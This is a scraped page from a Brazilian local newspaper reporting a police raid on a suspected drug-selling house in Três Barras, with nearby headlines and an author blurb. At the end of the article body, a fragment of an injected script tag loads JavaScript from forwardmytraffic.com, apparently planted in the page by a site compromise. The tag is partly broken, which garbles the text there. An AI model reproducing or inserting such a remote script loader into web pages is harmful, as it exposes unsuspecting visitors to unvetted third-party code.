InícioDestaquePolícia Prende Traficante em Três Barras

Polícia Prende Traficante em Três Barras

Últimas notícias

Pé-de-Meia: estudantes nascidos em março e abril recebem hoje R$ 200

Estudantes do ensino médio da rede pública nascidos março...

Homem com mandado de prisão ativo é capturado no centro de Canoinhas

Na terça-feira, 26, policiais militares receberam informações de um...

Mulher é conduzida a delegacia por utilizar “Gato” em rede de energia

Na terça-feira, 26, por volta das 10h40, policiais militares...

Na segunda-feira, 01, por volta das 20h, equipes da PM de Três Barras e de Canoinhas deslocaram até a Rua Venceslau Krupacz, bairro São Cristovão no município de Três Barras verificarem uma residência suspeita de estar sendo utilizada como ponto de trafico de drogas.

 

 

No local, os policiais militares constataram que a referida casa se encontrava abandonada e estava ocorrendo crime de tráfico de drogas. No interior da residência não havia móveis, somente um sofá velho, que estava acontecendo o comércio de droga, sendo localizado em cima do sofá uma balança de precisão de cor branca, um aparelho celular LG, dinheiro R$130,45 e dentro de um frasco de remédio 34 pedras de substancia semelhante a droga, (crack), aproximadamente 15 gramas de substância semelhante a maconha, um rolo de papel alumínio, uma carteira contento documentos pessoais de um jovem, suspeito de realizar o comércio.

 

 

Diante dos fatos todos os produtos foram apreendidos e entregues na Delegacia de Policia Civil de Canoinhas para serem tomadas as devidas providencias…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.